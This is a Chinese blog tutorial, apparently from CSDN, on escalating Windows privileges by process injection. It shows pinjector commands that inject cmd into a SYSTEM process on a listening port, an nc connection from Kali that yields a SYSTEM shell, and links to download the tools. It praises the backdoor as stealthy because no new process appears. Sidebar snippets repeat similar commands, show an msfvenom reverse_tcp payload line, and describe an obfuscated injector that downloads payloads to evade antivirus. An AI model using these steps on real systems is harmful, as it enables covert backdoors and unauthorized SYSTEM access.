【Windows提权】进程注入提权

最新推荐文章于 2024-07-24 17:43:16 发布
最新推荐文章于 2024-07-24 17:43:16 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 提权 文章标签: 进程注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114364409
版权

介绍

获取当前操作系统进程中所拥有的权限

注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】

注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。

攻击过程

使用工具列出当前操作系统的所有进程

pinjector.exe -l

在这里插入图片描述
可以看到不同的进程对应不同PID和用户。

执行pinjector.exe -p 600 cmd 2345注入进程pid600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。

使用kalinc 192.168.70.135 2345

在这里插入图片描述
反弹shell并提权为system

Windows2003&10进程注入提升
进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在windows2008之前操作系统上.所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统。

pinjector进程注入工具针对-win2008以前操作系统
pexec64 32进程注入工具针对-win2008及后操作系统-(佛系)
作者:https://www.cnblogs.com/LyShark/p/13785619.html

查看进程:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer

注入进程:
https://www.tarasco.org/security/Process_Injector/processinjector.zip

https://www.blib.cn/soft/pexec.zip

转载:https://www.cnblogs.com/NBeveryday/p/6239351.html

多学点技术
关注
专栏目录
进程注入进程提权
WgpSec狼组安全团队
06-04 1160
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1064
DLL注入提权、不带引号的服务路径提权、注册表提权
windows下的进程注入
12-21 122
。 转载于:https://www.cnblogs.com/beyond-Acm/p/4176687.html
Windows 进程权限浅谈 -- 提权 / 降权
最新发布
因热爱而执着,因执着而成功。
07-24 94
如何以编程方式控制进程的执行级别?如果登录用户是管理员账户,且开启了UAC,那么默认情况下双击一个程序时是以medium权限运行,称为受限的管理员权限,如果右键程序“以管理员权限运行”,那么程序是high权限,称为不受限的管理员权限。以产品更新为例,大部分时候产品主程序以在标准(非提升)级别运行,为了能够自我更新,它需要启动一个单独的更新进程,该更新进程需要提升才能正确执行升级。还是以产品更新为例,当以提升级别运行的更新程序完成更新任务,需要启动产品主进程,以标准(非提升)级别运行,此时则需要降权。
Windows进程注入提权
星落的博客
05-12 1536
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入 工具使用方法 pinjector.exe -l 查看可利用的进程 pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口 pinjector.exe -p 428 cmd 4444 nc -nv 192.168.31.132 4444获得system权限的shell。 ...
提权_Windows 2003 进程注入提权
草木
11-22 1732
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PID pinjector.exe -l 这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:356 2.接着使用命令注入刚才记住的进程,监听端口设置为9988 pinjector.exe -p 356 cmd.exe 9988 3.最后我们使用 nc 监听本地9988的端口 使用命令 whoami 可以看到注入提权成功。 ...
进程注入方法
traum的专栏
08-06 3479
                为了对内存中的某个进程进行操作,并且获得该进程地址空间里的数据,或者修改进程的私有数据结构,
processinjector
10-20
进程注射工具,以某一用户进程执行系统命令 程序附带源代码
系统提权之:Windows 提权
f_carey的博客
11-04 2754
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1452
进程迁移注入提权就是将获取到权限低的进程注入进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
lpk.rar_delphi 提权_提权
09-21
Windows系统中,提权是指非管理员用户获取更高的系统权限,通常用于安全研究或恶意软件活动中。Delphi是一种流行的面向对象的 Pascal 编程语言,常用于开发桌面应用,而"lpk.dll"可能是利用了Delphi编写的组件。 ...
ProcessInjector:用于教育目的的CC ++ Windows Process Injector
04-03
ProcessInjector C / C ++ Windows Process Injector用于教育目的。 该软件有什么作用? 这是一个使用CreateRemoteThread方法的简单过程注入器。 有效载荷使用Base64编码和单字节XOR加密进行模糊处理,以逃避。 它从远程地址下载有效负载。 您可以使用msfvenom有效负载或其他shellcode。 payload_encoder将使用msfvenom创建有效负载; 您可以更改有效载荷编码器和进样器的XOR键。 用法 使用payload_encoder或手动创建有效负载。 将其上传到Web服务器。 在目标机器上按以下方式执行它, ProcessInjector.exe <目标进程名称> 例子, ProcessInjector.exe Explorer.exe 责任信息 请将此程序用于法律和教育目的。 对于任何非法
injection:Windows进程注入方法
07-24
Windows 进程注入 下面是一些在 Windows 操作系统上用于进程注入的流行方法。
提权工具 pr.exe.zip
12-10
"pr.exe" 是一个可能被用作提权工具的可执行文件,它可能包含了特定的漏洞利用代码或者功能,使得攻击者能够在Windows环境中提升他们的权限级别。在Windows系统中,权限通常分为不同等级,如普通用户、管理员等。...
windows进程注入
Armandhe的博客
07-21 357
水数量的,不过文章写的还是很牛皮,虽然有些我看不懂
windows权限提升——windows2003进程注入提升(本地)
W小哥
12-03 4078
一、进程注入简介 进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。 版本: Windows2008之前 1.1 提权教程 演示环境:windows2003 1、将pinjector工具上传到目标服务器,运行以下命令 pinjector.exe       //运行命令,查看用法 pinjector.exe -l //列出可注入进程 pin
SysinternalsSuite本地提权&&提权进程注入学习
永不垂头的博客
08-26 418
SysinternalsSuite本地提权&&提权进程注入学习 文章目录SysinternalsSuite本地提权&&提权进程注入学习一、SysinternalsSuite本地提权二、提权进程注入学习三、我的公众号 一、SysinternalsSuite本地提权 下载网址:https://docs.microsoft.com/zhcn/sysinternals/downloads/sysinternals-suite 找到kali中的whoami.exe放到web练
Windows提权进程注入、Unattended Installs提权
negnegil的博客
09-12 972
进程注入提权 使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限 注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现 下载pinjector.exe https://www.tarasco.org/security/Process_Injector/index.html 上传 pinjector.exe到靶机可执行目录 ##列取所有进程 pinje
权限提升-令牌窃取&进程注入-提权
weixin_45701675的博客
11-19 393
令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
MS11-046提权源码分析
提权过程中,攻击者可能通过这个函数在目标进程注入恶意代码,实现权限提升。 此外,源码中定义了`RTL_PROCESS_MODULE_INFORMATION`和`RTL_PROCESS_MODULES`结构体,它们用于存储系统模块(如动态链接库DLL)的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值